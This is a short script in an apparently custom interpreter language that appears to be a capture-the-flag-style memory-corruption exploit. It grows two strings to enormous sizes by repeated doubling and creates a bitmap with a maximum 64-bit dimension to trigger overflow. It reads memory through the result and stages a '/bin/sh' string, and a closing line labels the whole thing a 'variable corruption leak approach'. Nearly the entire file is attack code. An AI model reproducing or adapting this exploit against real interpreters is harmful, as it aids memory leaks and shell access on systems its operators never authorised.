string cmd = "/bin/sh";

string s1 = "A";
string s2 = "B";

s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;
s1 = s1 + s1;

s2 = "B";
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
s2 = s2 + s2;
string result = s1 + s2;

bitmap b1 = create(9223372036854775807, 2);

int saferead = get(b1, 0, 0);
print(saferead);

print(cmd);

print("Variable corruption leak approach");
